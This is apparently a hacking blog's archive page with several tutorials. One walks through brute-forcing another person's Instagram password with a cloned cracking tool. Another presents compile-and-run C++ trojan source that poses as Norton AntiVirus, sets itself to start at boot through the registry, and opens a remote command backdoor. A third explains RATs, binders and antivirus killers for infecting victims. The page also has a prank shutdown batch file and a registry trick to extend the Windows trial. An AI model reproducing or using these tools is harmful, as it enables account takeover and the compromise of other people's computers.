Showing posts with label Computer. Show all posts
Showing posts with label Computer. Show all posts

Sunday, 10 June 2018

How To Hack Instagram Account - SAMHACKERSWORLD

NOTE : THIS TUTORIAL IS FOR EDUCATIONAL PURPOSE ONLY 

Welcome Friends, Today I am sharing with you a great idea.Now a days everyone wants to Hack Instagram Account.So Today I will Tell you How To Hack Instagram Account.Now Let's go on  a our Topic.👇

STEP-1: INSTALL TERMUX APP FROM PLAY STORE OR ANY WHERE OR CLICK HERE

STEP-2: GOTO INSTAGRAM AND COPY INSTAGRAM ID WHICH YOU WANT TO HACK

STEP-3: GOTO TERMUX APP AND TYPE "pkg update" AND HIT ENTER

STEP-4: AFTER THAT ASK "Y/N" WRITE "Y" AND HIT ENTER

STEP-5: NOW TYPE "pkg upgrade" AND HIT ENTER

STEP-6: NOW TYPE "apt install python2" AND HIT ENTER

STEP-7: NOW TYPE "apt install git" AND HIT ENTER

STEP-8: GOTO BROWSER AND SEARCH "INSTAHACK GITHUB" AND OPEN WEBSITE & COPY LINK

                                       OR

STEP-9: COPY LINK "https://github.com/avramit/instahack"

STEP-10: NOW OPEN TERMUX APP AND TYPE "git clone https://github.com/avramit/instahack" AND HIT ENTER

STEP-11: NOW TYPE "ls" AND HIT ENTER


STEP-12: NOW TYPE "cd instahack" AND HIT ENTER

STEP-13: NOW TYPE "ls" AND HIT ENTER

STEP-14: NOW WE HAVE TO REMOVE/DELETE THE PASSWORD "wordlist.txt" FILE BECAUSE THIS WORD LIST CONTAINS ONLY TWO OR THREE PASSWORDS AND ADD A BIG "wordlist.txt" FILE

STEP-15: NOW TYPE "rm -f pass.txt" AND HIT ENTER

STEP-16: NOW TYPE "ls" AND HIT ENTER

STEP-17: YOU CAN ADD ANY "wordlist.txt" FILE

STEP-18: RENAME ANY WORDLIST FILE AS "pass.txt"

STEP-19: NOW WE WILL COPY THE WORDLIST FILE IN INSTAHACK DIRECTORY TYPE "cd /sdcard" AND HIT ENTER

STEP-20: NOW TYPE "ls" AND HIT ENTER

STEP-21: NOW TYPE "cp -f pass.txt $HOME/instahack" AND HIT ENTER

STEP-22: NOW TYPE "ls" AND HIT ENTER

STEP-23: NOW TYPE "cd $HOME" AND HIT ENTER

STEP-24: NOW TYPE "ls" AND HIT ENTER

STEP-25: NOW TYPE "cd instahack" AND HIT ENTER

STEP-26: NOW TYPE "ls" AND HIT ENTER

STEP-27: NOW YOU SEE WORDLIST IS COPIED HERE

STEP-28: NOW OPEN INSTAHACK TYPE "python2 hackinsta.py" AND HIT ENTER

STEP-29: NOW TYPE "INSTAGRAM USERNAME" AND HIT ENTER

STEP-30: NOW TYPE "n" AND HIT ENTER

STEP-31: PLEASE WAIT UNTIL IT FINDS CORRECT PASSWORD

STEP-32: WHEN YOU FOUND CORRECT PASSWORD SO COPY PASSWORD

STEP-33: NOW GOTO INSTAGRAM WEBSITE OR APP AND TYPE USER NAME AND PASTE PASSWORD THEN CLICK ON LOGIN BUTTON

NOW YOU SUCCESSFULLY HACKED INSTAGRAM ACCOUNT
                                        ------------------------------
                                 |SAMHACKERSWORLD|
                                 ----------------------------

Sunday, 29 April 2018

Windows Hacks- SAMHACKERSWORLD

NOTE : THIS TUTORIAL IS FOR EDUCATIONAL PURPOSE ONLY .

Hello friends. Today in this tutorial we are going to learn few windows hacks which may be useful in various points of time in our life.

REQUIREMENTS:-

COMPUTER / LAPTOP .


Do this if your PC hanged:-

Press shift+Ctrl+Esc

or

Ctrl+alt+Del

and then click on ‘END TASK’

To extend windows 7/8/8.1  trial period up to one year:-

Type “cmd” in the Windows start menu search box.


Right click on ‘Command Prompt’ and chose ‘Run as administrator’.


Type the following command: slmgr -rearm .


After restart your windows will be genuine for next 30 days.


      

You can use this command 3 times. ie for 90 days. To extent it for 8more times follow the following steps.

    

Type “regedit” in the start menu search box and hit ‘Enter’.


 2. Navigate through the following path at the registry editor from the left sidebar.

                      

 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform

                            

 

 3. In the right pane, find out the value SkipRearm.

 4. Now double-click on it and change the value from 0 to 1.

 5. It’s done. Now you can extend the trail period for extra 240 days.

To crack BIOS password:-

Turn off the computer and disconnect the main battery.


Open the CPU.


Remove the Silver Battery(3v) on the Motherboard.


Press the power button for at least 10 seconds to drain all residual power from the system.


Start the windows.


To clean up the Ram:-

Open notepad


Type FREEMEM=SPACE(64000000)


Save it as ram.vbs


Now run the script.


To share file in speed:-

Go to Run and type SHRPUBW.EXE then press Enter.


Select the folder you want to share and Set permissions.


your folder is now ready for sharing.


Create a folder without name:-

Select any folder.


Select Rename it.


Press alt & type 0160 or 255.


Press enter.


Open Command Prompt when Locked by User:-

Open notepad


Type www.command.com


Then save as cmd.bat at desktop


Now open the bat file to open CMD.


HOW TO USE PEN DRIVE AS RAM - SAMHACKERSWORLD

Welcome Friends Today I am going to tell you about HOW TO USE PEN DRIVE  AS RAM.So friends let's go on our Topic 👇
♩🔰 SAMHACKERSWORLD🔰♩ 💯% Working 💰

⭕HOW TO USE PEN DRIVE  AS RAM :

1. First of all plug your USB in the USB port and make sure that you do not have any important data on USB.

2. Open your “My Computer” and Right click onto the USB. Which you want to use as RAM.

3. Select “Properties” (the last option) from the drop down menu.

4. A new window will open select “Ready Boost” Tab from there. And tick on the “Use this device” button.

5. Select the space which you want to use for RAM.

6. Finally click onto the “Apply” and then finally “OK” button.

7. That’s it you have successfully used your USB (Pen drive) as a virtual memory (RAM) for your computer

Hide File In Image - SAMHACKERSWORLD

NOTE : THIS TUTORIAL IS FOR EDUCATIONAL PURPOSE ONLY .

Hello friends. Today in this tutorial we are going to learn a technique to hide file in image.

REQUIREMENTS:-

COMPUTER / LAPTOP .

WINRAR / .ZIP / .RAR .


PROCESS:-

STEP 1 : Download Winrar.

    

STEP 2 : Create New folder in D drive.

                    

STEP 3 : Put all the files you want to hide in that folder.

                   

STEP 4 : Select all files and create a .rar file. The  new .rar file should be in the same folder.

              

STEP 5 : Open command prompt (press ‘Window+R’, type ‘cmd’ & press ‘Enter’ key).

              

STEP 5 : Now type following codes.

cd D:\New folder press enter.


copy /b example.jpg + example.rar example.jpg. press enter.


Done ! your  image file has all other files hidden in it.


                            

STEP 5 : To open hidden file 

 

Simply right click example.jpg and select open with winrar.


You can also simply change file extension from example.jpg to example.rar.

Sunday, 22 April 2018

Command's list - SAMHACKERSWORLD


chmod - give especific permissions to an specific file 

cat - look at, modify, or combine a file. You can also copy files with this command by "reading" it to another file instead of to the screen.

cd - change from one directory to another

cp - Copy a file from one location to another

dd - copies exact locations to other locations. Can be an entire drive, a folder, etc. dd if= of=. uses an input file and an output file.

df - how much free disk space. 

du - show disk usage of files. Add "-h" to get human readable. Especially useful when you add "-d1" to limit the directory depth to 1. If you run "du -h -d1", it will tell you how much space each directory occupies, including their contents summed.

exit - exits the shell you are in.

grep - search within a file for a text string. Also useful for parsing command output. 'ls | grep something' is a quick way to list files that contain the string "something" (although "ls *something*" would do it, too, but grep can do a lot more)

ifconfig- get network interface configuration. Good for getting your own IP address.

kill - kill a process by PID

ls - lists all files in a directory .

mv - Move a file from one location to another. 

ping - see if an internet host is alive

pm - android package manager. LOTS of useful things in here, type pm by itself for the help screen

ps - list processes. Useful to see what is running

reboot - reboots your device

reboot recovery - reboots you into recovery 

reboot-bootloader -reboots the device in bootloader- fastboot

rm - remove a specified file

rmdir - remove a directory. rm can't do it unless you remove recursively with -R

su - Substitute User. We type this to switch to the rootuser. You need to type this command first to do a lot of the other commands.

sync - synchronizes any data on disk with data in memory. We type this before rebooting to ensure we've got all data written

tar - creates taped archives. Compresses files like winzip, 7zip, winrar and others tar

top - like task manager, it displays running processes. in Linux the q key quits. On Android I don't know how to make it quit other than closing the app.

uptime - displays how long it has been since you last rebooted the system. Interestingly enough the "Menu Key > System > About Phone > Status > Up time" on my phone does not match "uptime" typed in the terminal emulator.

Sunday, 15 April 2018

HOW TO SHUTDOWN SOMEONE’S COMPUTER WITHOUT TOUCHING - SAMHACKERSWORLD

Notepad is the text editor which comes with Microsoft Windows operating system. Considering the fact that Microsoft Windows is running on a maximum number of computers today, we are going to share another trick that will help you shut down anyone’s computer.

The tutorial will not harm anyone computer. You can use this trick to play the prank with your buddies. So, lets’ know how to shut down computer using a notepad

The entire tutorial will hardly take few seconds. Here’s how to shut down the computer after conveyinga message

Right click on the desktop and then select New > Text Document and then copy and paste the following command given below:

@ECHO OFFMSG * ITS TIME TO GET SOME REST.SHUTDOWN -C “ERROR! YOU HAVE TO TAKE REST! BYEEEEEE” -S 

Now save the file asanyname.bat. For example: dienow.bat

Now you can copy and paste the batch file in your Pendrive and run this file on anyone’s computer to shut down the computer.

But, keep in mind that this may lead to loss as it shuts down the computer forcefully.

If you are having any problem at any step then feel free to ask us in the comment box below. We hope you like the article, share it with others also.

                       Thank's for reading my article

Software to Hack Computer Remotely: RAT (Remote Access Trojan) - SAMHACKERSWORLD

I am back with a completely new hacking topic – hacking computer remotely. This software  called â€œProrat,” is used to hack computers remotely.


RATs :


The RAT acronym stands for Remote Administration Tool. A RAT is a software, popularly used to control other computers remotely.


Some examples of RATs are:
Prorat
Turkojan
Yuri RAT and many other.


Working of RATs:


To hack a computer remotely using a RAT, you have to create a server and then send this server to the victim whose computer you’re trying to hack. Generally, this server is binded to any file, like a picture or song, so that whenever the victim opens the file on his computer, our server is installed. This server opens a port on the victim’s computer, allowing you to remotely hack the device via the open port.


This RAT server then sends all system information to PRORAT, allowing us to then hack the computer.


Things you can do by hacking computers remotely:


Once you gain remote access to the computer, you can perform any of the following:


# Install a keylogger
# Monitor chat windows
# Shutdown computer remotely
# Take control of system registry
# Hack locally stored passwords and licence keys
# Download additional malware and servers to gain stronger control
# Control and access all Control Panel options (including add or remove programs)
# Send various error messages
# Access printer services
# Erase all disk data by formatting drives
# Open FTP connection and start file transaction


Thus, you gain total control of the computer. Hence, why this software is very popular.


Disadvantage of Remote Hacking Software RAT:


The main disadvantage of the RAT software is that the server created to hack into the computer remotely is recognized by most antiviruses as a hack tool, and antiviruses send alert messages when installing a RAT server.
Luckily, there are many software options like Binders or Crypters that hide RAT servers and prevent antiviruses from sending alerts. There are even softwares like AVkiller which render antivirus software inactive, allowing our server (used to hack computer remotely) to be easily installed on the victim’s computer.


This is all about RATs – software used to hack computers remotely. In my next article, I will discuss server creation and installation on remote computers.


Thursday, 12 April 2018

ALL CMD COMMAND'S - SAMHACKERSWORLD

All CMD Commands are Bellow..

1. Accessibility Controls ==> uj access.cpl

2. Accessibility Wizard ==> accwiz

3. Add Hardware Wizard ==> hdwwiz.cpl

4. Add/Remove Programs ==> appwiz.cpl

5. Administrative Tools ==> control admintools

6. Automatic Updates ==>  wuaucpl.cpl

7. Bluetooth Transfer Wizard ==> fsquirt

8. Calculator ==>  calc

9. Certificate Manager ==> certmgr.msc

10. Character Map ==> charmap

11. Check Disk Utility ==> chkdsk

12. Clipboard Viewer ==> clipbrd

13. Command Prompt info ==> cmd

14. Component Services ==> dcomcnfg

15. Computer Management ==> compmgmt.msc

16. Control Panel ==> control

17. Date and Time Properties ==> timedate.cpl

18. DDE Shares ==> ddeshare

19. Device Manager ==> devmgmt.msc

20. Direct X Troubleshooter ==> dxdiag

21. Disk Cleanup Utility ==> cleanmgr

22. Disk Defragment ==> dfrg.msc

23. Disk Management ==> diskmgmt.msc

24. Disk Partition Manager ==> diskpart

25. Display Properties ==> control desktop

26. Display Properties ==> desk.cpl

27. Dr. Watson System Troubleshooting Utility ==> drwtsn32

28. Driver Verifier Utility ==> verifier

29. Event Viewer ==> eventvwr.msc

30. Files and Settings Transfer Tool ==> migwiz

31. File Signature Verification Tool ==> sigverif

32. Findfast ==> findfast.cpl

33. Firefox ==> firefox

34. Folders Properties ==> control folders

35. Fonts ==> control fonts

36. Fonts Folder ==> fonts

37. Free Cell Card Game ==> freecell

38. Game Controllers ==> joy.cpl

39. Group Policy Editor (for xp professional) ==> gpedit.msc

40. Hearts Card Game ==> mshearts

41. Help and Support ==> helpctr

42. HyperTerminal ==> hypertrm

43. Iexpress Wizard ==> iexpress

44. Indexing Service ==> ciadv.msc

45. Internet Connection Wizard ==> icwconn1

46. Internet Explorer ==> iexplore

47. Internet Properties ==> inetcpl.cpl

48. Keyboard Properties - control keyboard

49. Local Security Settings ==> secpol.msc

50. Local Users and Groups ==> lusrmgr.msc

51. Logs You Out Of Windows ==> logoff

52. Malicious Software Removal Tool ==> mrt

53. Microsoft Chat ==> winchat

54. Microsoft Movie Maker ==> moviemk

55. Microsoft Paint ==> mspaint

56. Microsoft Syncronization Tool ==> mobsync

57. Minesweeper Game ==> winmine

58. Mouse Properties ==> control mouse

59. Mouse Properties ==> main.cpl

60. Netmeeting ==> conf

61. Network Connections ==> control netconnections

62. Network Connections ==> ncpa.cpl

63. Network Setup Wizard ==> netsetup.cpl

64. Notepad ==> notepad

65. Object Packager ==> packager

66. ODBC Data Source Administrator ==> odbccp32.cpl

67. On Screen Keyboard ==> osk

68. Outlook Express ==> msimn

69. Paint ==> pbrush

70. Password Properties ==> password.cpl

71. Performance Monitor ==> perfmon.msc

72. Performance Monitor ==> perfmon

73. Phone and Modem Options ==> telephon.cpl

74. Phone Dialer ==> dialer

75. Pinball Game ==> pinball

76. Power Configuration ==> powercfg.cpl

77. Printers and Faxes ==> control printers

78. Printers Folder ==> printers

79. Regional Settings ==> intl.cpl

80. Registry Editor ==> regedit

81. Registry Editor ==> regedit32

82. Remote Access Phonebook ==> rasphone

83. Remote Desktop ==> mstsc

84. Removable Storage ==> ntmsmgr.msc

85. Removable Storage Operator Requests ==> ntmsoprq.msc

86. Resultant Set of Policy (for xp professional) ==> rsop.msc

87. Scanners and Cameras ==> sticpl.cpl

88. Scheduled Tasks ==> control schedtasks

89. Security Center ==> wscui.cpl

90. Services ==> services.msc

91. Shared Folders ==> fsmgmt.msc

92. Shuts Down Windows ==> shutdown

93. Sounds and Audio ==> mmsys.cpl

94. Spider Solitare Card Game ==> spider

95. SQL Client Configuration ==> cliconfg

96. System Configuration Editor ==> sysedit

97. System Configuration Utility ==> msconfig

98. System Information ==> msinfo32

99. System Properties ==> sysdm.cpl

100. Task Manager ==> taskmgr

101. TCP Tester ==> tcptest

102. Telnet Client ==> telnet

103. User Account Management ==> nusrmgr.cpl

104. Utility Manager ==> utilman

105. Windows Address Book ==> wab

106. Windows Address Book Import Utility ==> wabmig

107. Windows Explorer ==> explorer

Tuesday, 3 April 2018

TROJAN VIRUS SOURCE CODE - SAMHACKERSWORLD



TAKE IT +==> COMPILE +==>> RUN  !

——————————-

#include
#include
#include
using namespace std;

char Windir[MAX_PATH];
char Module[MAX_PATH];

SOCKET Socket;

void Hide()
{
SetConsoleTitle(“Norton AntiVirus”);
hide = FindWindow(NULL, “Norton AntiVirus”);
ShowWindow(hide, 0);
}

void GetPaths()
{
GetSystemDirectory(Windir, sizeof(Windir));
GetModuleFileName(0, Module, sizeof(Module));
strcat(Windir, “\\WindowsAPICalls.exe”);
}

void Install()
{
CopyFile(Module,Windir,0);

HKEY Install;
RegOpenKey(HKEY_LOCAL_MACHINE,”Software\\Microsoft\\Windows\\CurrentVersion\\Run”, &Install);
RegSetValueEx(Install, “Windows API Calls”, 0, REG_SZ, (LPBYTE)Windir, sizeof(Windir));
RegCloseKey(Install);
}

int ServerInitialize()
{
WSADATA wsaData;
int iResult = WSAStartup( MAKEWORD(2,2), &wsaData );
if ( iResult != NO_ERROR )
{
WSACleanup();
system(Module);
return 0;
}

else
{
cout << “Winsock initialized.” << “\n”;
}

Socket = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );

if (Socket == INVALID_SOCKET )
{
WSACleanup();
system(Module);
return 0;
}

else
{
cout << “Socket created.” << “\n”;
}

sockaddr_in service;
service.sin_family = AF_INET;
service.sin_addr.s_addr = INADDR_ANY;
service.sin_port = htons(5432);

if (bind(Socket, (SOCKADDR*) &service,sizeof(service)) == SOCKET_ERROR)
{
closesocket(Socket);
system(Module);
return 0;
}

else
{
cout << “Socket bound successfully.” << “\n”;
}
if (listen( Socket, 1 ) == SOCKET_ERROR )
cout << “Error listening on socket.” << “\n”;

SOCKET AcceptSocket;

cout << “Waiting for a client to connect
” << “\n”;
AcceptSocket = SOCKET_ERROR;
while (AcceptSocket == SOCKET_ERROR )
{
AcceptSocket = accept(Socket, NULL, NULL );
}
cout << “Client Connected.”<< “\n”;
Socket = AcceptSocket;
}

void Shutdown()
{
char Message[MAX_PATH]=”Your computer is infected with a malicious virus!”;
InitiateSystemShutdown(NULL,Message,sizeof(Message),true,false);
}

void OpenCloseCDTray()
{
mciSendString(“set cdaudio door open”, 0, 0, 0);
mciSendString(“set cdaudio door open”, 0, 0, 0);
}

void Bomb()
{
HWND hwnd;
char Notepad[MAX_PATH]=”notepad.exe”;
for(;;)
{
ShellExecute(hwnd,”open”,Notepad,NULL,NULL,SW_MAXIMIZE);
}
}

void LeftMouse()
{
SwapMouseButton(true);
}

void RightMouse()
{
SwapMouseButton(false);
}

void Receive()
{
for(;;)
{
char Choice[MAX_PATH]=”";
cout << “Waiting for commands, sir!” << “\n”;
recv(Socket, Choice, sizeof(Choice), 0);
cout << Choice << “\n”;
if (!strcmp(Choice,”1″))
{
LeftMouse();
const char c_LeftMouse[MAX_PATH]={“Mouse changed; left.”};
send(Socket,c_LeftMouse, sizeof(c_LeftMouse),0);
}
if (!strcmp(Choice,”2″))
{
RightMouse();
const char c_RightMouse[MAX_PATH]={“Mouse changed; right.”};
send(Socket,c_RightMouse, sizeof(c_RightMouse),0);
}
if (!strcmp(Choice,”3″))
{
OpenCloseCDTray();
const char c_CDTray[MAX_PATH]={“CD Tray opened.  Closed if not on a laptop.”};
send(Socket,c_CDTray, sizeof(c_CDTray),0);
}
if (!strcmp(Choice,”4″))
{
Shutdown();
const char c_Shutdown[MAX_PATH]={“Shutdown initiated.”};
send(Socket,c_Shutdown, sizeof(c_Shutdown),0);
}
}
}

int main()
{
Hide();
GetPaths();
if(!strcmp(Windir,Module))
{
ServerInitialize();
Receive();
}
else
{
Install();
ServerInitialize();
Receive();
}
return 0;
}

Warning:- Don't Run On your Personal Computer.

     -----------------------------------
----SAMHACKERSWORLD----
     -----------------------------------

Wednesday, 28 February 2018

Beautiful 404 Not Found With Particles Using Bootstrap

Beautiful 404 Not Found Page With Particles Using Bootstrap – It’s a creative, modern and conceptual 404 page coded in bootstrap. Pages with a clean & unique design, ideal for blog, portfolio, agency, clean and elegant template for every creative people, corporate, e-commerce, photographers or anyone who want to show a 404 not found page in creative way.
404 Not Found Page

How To Make 404 Not Found With Particles Using Bootstrap

HTML
CSS
JS
How To Use